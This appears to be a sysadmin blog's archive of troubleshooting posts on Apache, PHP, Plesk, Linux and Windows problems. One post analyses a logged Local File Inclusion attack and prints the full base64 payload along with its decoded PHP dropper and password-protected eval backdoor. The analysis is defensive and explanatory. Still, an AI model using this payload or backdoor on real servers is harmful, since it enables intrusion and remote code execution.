Author Archives: A Tech named Bob

Options FollowSymLinks or SymLinksIfOwnerMatch is off which implies that RewriteRule directive is forbidden

by

0

Symptoms:Options FollowSymLinks or SymLinksIfOwnerMatch is off which implies that RewriteRule directive is forbidden

Either the .htaccess file is missing the followsymlinks option or another .htaccess is overriding the options.

NOTE: There are TWO Solutions to this problem, I recommend trying Solution #2 first.

Solution #1:

Add: 

Options FollowSymLinks

Above:
RewriteEngine On
RewriteBase /

(Note: you must have “AllowOverride Options” in effect to permit the use of the “Options” directive in .htaccess files.)

If you are trying to access a pearl type file in a cgi-bin or other directory that does not require the rewrite rule, add an .htaccess file with RewriteEngine off.  This will prevent the above error from occurring.

It is best to add this solution to the httpd.conf file if you have access, the how-to on that file can be found here:

http://httpd.apache.org/docs/current/howto/htaccess.html

 Solution #2:

Modify the dir.conf in apache.

Step 1: From root SSH: vi /etc/apache2/mods-enabled/dir.conf

Step 2 Change:

DirectoryIndex at_domains_index.html index.html index.cgi index.pl index.php index.xhtml index.htm index.shtml index.cfm

to:

DirectoryIndex at_domains_index.html index.html index.cgi index.php index.pl index.xhtml index.htm index.shtml index.cfm

A Simple change in order fixes the symlinks issue.

Special Thanks to XAMeLeOH for posting this for the community.


Connection reset by peer: mod_fcgid: error reading data from FastCGI server

by

0

Symptoms: The following errors are found in the web server error logs:

Connection reset by peer: mod_fcgid: error reading data from FastCGI server

Premature end of script headers: index.php

Solutions:  This is one of those frustrating errors that can take a long time to fix and may be dependent on multiple problems.  The solution that worked in my case was adding:

ini_set(‘zend.enable_gc’, 0); <<Below the <?php tag in the index.php

Why does this work?  There are known conflicts between zend and APC, if both are installed you may receive the above error, adding the above code into your php file should resolve your issue.

Other possible solutions:  Modify your php.ini to increase max_execution_time, post_max_size, and max_input_time :: IMPORTANT – Make sure you maintain a limit, no limit could result in massive resource usage.


Plesk: Test Directory located in /httpdocs/test/

by

0

Description:  In default Plesk Installations a folder called Test is created under httpdocs/  this folder contains a series of scripts designed to perform “hello world” type tests to confirm that those scripting languages can be used.

If the test scripts are no longer needed you can remove the directory

If you would like to keep the scripts but prevent access to them, you can either:

1. chmod the directories to 700 and files to 644; or

2. Move the test folder out of the httpdocs/ directory into a non-webaccessible directory for later use.

 

/proc/self/environ Server Log – Hacking Attempt

by

3

Symptom: Web server logs show entries similar to “GET /index.php?inc=../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0” 200 22702 “” ” ##php eval(base64_decode(\”YWRkTG9hZGVyKCk7DQokZGF0YSA9IEBvcGVuZGlyKCcuJyk7DQoNCndoaWxlICgkZmlsZSA9IEByZWFkZGlyKCRkYXRhKSkNCnsNCgkkZmlsZSA9IHRyaW0oJGZpbGUpOw0KCWlmICghJGZpbGUgfHwgcHJlZ19tYXRjaCgnL15cLiskLycsICRmaWxlKSB8fCAhaXNfZGlyKCRmaWxlKSkgY29udGludWU7DQoJYWRkTG9hZGVyKCRmaWxlKTsNCn0NCg0KQGNsb3NlZGlyKCRkYXRhKTsNCg0KZnVuY3Rpb24gYWRkTG9hZGVyKCRkaXIgPSAnJykNCnsNCiAgICBpZiAoJGRpcikgJGRpciAuPSAnLyc7DQogICAgQGNobW9kKCRkaXIsIDc3Nyk7DQogICAgDQogICAgJGZwID0gZm9wZW4oInskZGlyfWVkNjllZDYwYmU0ODViYTFkY2QwMDc3MzRiODM2Y2E4LnBocCIsICJ3Iik7IA0KICAgIGZ3cml0ZSgkZnAsIGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ2cwS1FHbHVhVjl6WlhRb0oyRnNiRzkzWDNWeWJGOW1iM0JsYmljc0lERXBPdzBLUUdsdWFWOXpaWFFvSjJSbFptRjFiSFJmYzI5amEyVjBYM1JwYldWdmRYUW5MQ0EyTUNrN0RRcEFhVzVwWDNObGRDZ25iV0Y0WDJWNFpXTjFkR2x2Ymw5MGFXMWxKeXdnTmpBcE93MEtRSE5sZEY5MGFXMWxYMnhwYldsMEtEWXdLVHNOQ2cwS0pHUmhkR0VnUFNCQWRXNXpaWEpwWVd4cGVtVW9ZbUZ6WlRZMFgyUmxZMjlrWlNoMGNtbHRLRUFrWDFCUFUxUmJKMlJoZEdFblhTa3BLVHNOQ2cwS2FXWWdLRUFoYVhOZllYSnlZWGtvSkdSaGRHRXBJSHg4SUcxa05TZ2taR0YwWVZzbmNHRnpjM2R2Y21RblhTa2dJVDBnSjJRelpHWTBNemxqTTJVMFlqSmpOREU1TWpCa09HVXlOek16TVRFek1qTTJKeWtnWlhocGREc05DbWxtSUNoQUpHUmhkR0ZiSjJOdlpHVW5YU2tnWlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NSa1lYUmhXeWRqYjJSbEoxMHBLVHNOQ21sbUlDaEFKR1JoZEdGYkoyTm9aV05yWDJOdlpHVW5YU2tnY0hKcGJuUWdKR1JoZEdGYkoyTm9aV05yWDJOdlpHVW5YVHNOQ2cwS1B6ND0nKSk7DQoJZmNsb3NlKCRmcCk7DQoNCglpZiAoZmlsZV9leGlzdHMoInskZGlyfWVkNjllZDYwYmU0ODViYTFkY2QwMDc3MzRiODM2Y2E4LnBocCIpKQ0KCXsNCiAgICAgICAgJGNrID0gIjE4MjM2NDkzNjU4MjAzNTQiOw0KCSAgICBwcmludCAiJGNrOnsqfTokZGlyOnsqfToiOw0KCQlleGl0Ow0KCX0NCn0=\”)); ##”

Please note that the <? and > were removed for security reasons and replaced with ##

Description:  This is a poisoned null byte hacking attack, often conducted by bot’s. If the postfix null bytes are not handled correctly it can lead to an exploit in the system, this technique is called Local File Inclusion. In addition to the Local File Inclusion (LFI), this version is attempting to execute code by running a php statement that is encoded with Base 64.

If this attack is successful, it will result in the inclusion of the /proc/self/environ file or other requested file, instead of the originally requested file (index.php) in this case, in addition, the php script if run, will append its code to the original file and create a new file that will notify the hacker of success.

Lets delve a bit deeper here…  Anything prefixed with ## is a comment I inserted into the code. The Base 64 code within the Eval Statements translates to…:

addLoader();
$data = @opendir(‘.’);  ## We have data!!

while ($file = @readdir($data))  ## While we are reading the data… lets work on this…
{
$file = trim($file);
if (!$file || preg_match(‘/^\.+$/’, $file) || !is_dir($file)) continue;  ## If there is no file, or if it matches, or there is no directory for the file…  load another file…
addLoader($file);
}

@closedir($data);

function addLoader($dir = ”)
{
if ($dir) $dir .= ‘/’;  ##Try to set the root directory
@chmod($dir, 777); ## Set it to 777 which provides access to everything

$fp = fopen(“{$dir}ed69ed60be485ba1dcd007734b836ca8.php”, “w”);  ##Lets create the following file and write the contents too it.
fwrite($fp, base64_decode(‘PD9waHANCg0KQGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOw0KQGluaV9zZXQoJ2RlZmF1bHRfc29ja2V0X3RpbWVvdXQnLCA2MCk7DQpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgNjApOw0KQHNldF90aW1lX2xpbWl0KDYwKTsNCg0KJGRhdGEgPSBAdW5zZXJpYWxpemUoYmFzZTY0X2RlY29kZSh0cmltKEAkX1BPU1RbJ2RhdGEnXSkpKTsNCg0KaWYgKEAhaXNfYXJyYXkoJGRhdGEpIHx8IG1kNSgkZGF0YVsncGFzc3dvcmQnXSkgIT0gJ2QzZGY0MzljM2U0YjJjNDE5MjBkOGUyNzMzMTEzMjM2JykgZXhpdDsNCmlmIChAJGRhdGFbJ2NvZGUnXSkgZXZhbChiYXNlNjRfZGVjb2RlKCRkYXRhWydjb2RlJ10pKTsNCmlmIChAJGRhdGFbJ2NoZWNrX2NvZGUnXSkgcHJpbnQgJGRhdGFbJ2NoZWNrX2NvZGUnXTsNCg0KPz4=’));
fclose($fp); ##again… we are encoded in base 64

if (file_exists(“{$dir}ed69ed60be485ba1dcd007734b836ca8.php”))
{
$ck = “1823649365820354”;
print “$ck:{*}:$dir:{*}:”;
exit;
}
}

##Here is our decoded Base 64

##php

@ini_set(‘allow_url_fopen’, 1);  ##Lets override the standard PHP File
@ini_set(‘default_socket_timeout’, 60);  ##Now we have opened a socket
@ini_set(‘max_execution_time’, 60);
@set_time_limit(60);

$data = @unserialize(base64_decode(trim(@$_POST[‘data’])));

if (@!is_array($data) || md5($data[‘password’]) != ‘d3df439c3e4b2c41920d8e2733113236’) exit;
if (@$data[‘code’]) eval(base64_decode($data[‘code’]));  ##If there’s data, lets check it out
if (@$data[‘check_code’]) print $data[‘check_code’];

##

Summary:  If successful, this exploit will bypass your PHP settings, set one of your directory’s to world access, and write a file with the above name .php and provide a backdoor to your server.

Solutions:

1. Consider using mod_security add on for Linux/Unix Servers

2. Use .htaccess files to prevent this kind of exploit

3. Use a firewall program to prevent unwanted access

4. STAY UP TO DATE.


userdel (options) username

by

0

userdel is used in Unix / Linux systems to remove a user from the system.

Flags:

-h –help; Display the help/man information and exit

-r –remove; this flag will remove the user’s home directory and associated mail.  If the user is logged in or has processes running, this command will not work.

-f –force; force the removal of the user even if the user is logged in. This should only be used as a last resort as it could potentially damage your file systems.

SYNTAX: # userdel -r/-f/-h username.

 

Blue Screen of Death keycrypt64.sys

by

4

Symptoms: Computer is an HP Model that suddenly blue screens and returns an error with keycrypt64.sys before rebooting.

Items Needed: USB Mouse, USB Keyboard, Windows Boot Disk or Utility Disk

Solution: A recent update push to Constant Guard (Comcast) has a conflict with the default keyboard / mouse dll for HP Machines. This is a temporary fix.

Step 1. Boot the machine using the utility boot disk to access a command prompt.

Step 2. Copy C:\windows\system32\drivers\hpqkbfiltr.sys to C:\windows\system32\drivers\hpqkbfiltr.old (THIS WILL DISABLE YOUR KEYBOARD AND MOUSE THAT ARE NOT USB)

Step 3. Attach the USB Keyboard and Mouse plugged into a side port and reboot the laptop. Windows should boot normally.

Step 4. Once logged into windows, go to control panel, add/remove programs and remove Comcast Constant Guard

Step 5.  Reboot and use the USB Keyboard and mouse to rename C:\windows\system32\drivers\hpqkbfiltr.old to C:\windows\system32\drivers\hpqkbfiltr.sys

Step 6. Reboot, unplug USB Keyboard and Mouse, computer should be running fine..

Special Thanks to Bob Bailey for posting this solution for the community!

Plesk: Scheduled Task for script not running

by

0

Symptoms: A task is scheduled in Plesk under Scheduled Tasks, the task attempts to run a php script but fails.

Solution:
By Default Plesk 11 does not allow execution of scripts in a non-chrooted environment,

To Allow execution of Scripts, change the server policy from the command prompt:

# /usr/local/psa/bin/server_pref -u -crontab-secure-shell “/bin/sh”

To disallow:
# /usr/local/psa/bin/server_pref -u -crontab-secure-shell “”

Windows: Microsoft Office Word, Excel, Powerpoint, Internet Explorer Close unexpectedly

by

8

Problem: Microsoft Office Word, Excel, Powerpoint, and Internet Explorer close unexpectedly on a regular basis in Vista. Crash report lists gdiplus.dll_unloaded as the module.

Solution:

1. gdiplus.dll_unloaded is in conflict with Apple iCloud, uninstall the iCloud program and reboot the machine, this will correct the regular crashes.

2. If you want to maintain iCloud, open Windows Control Panel, find the iCloud control panel icon, open the control panel and allow iCloud to deploy fully to all of the programs on the affected computer. This will result in new icons appearing in Word and Excel.

3. If neither of the above solutions work, or if gdiplus.dll is not listed, try scanning the machine for malware.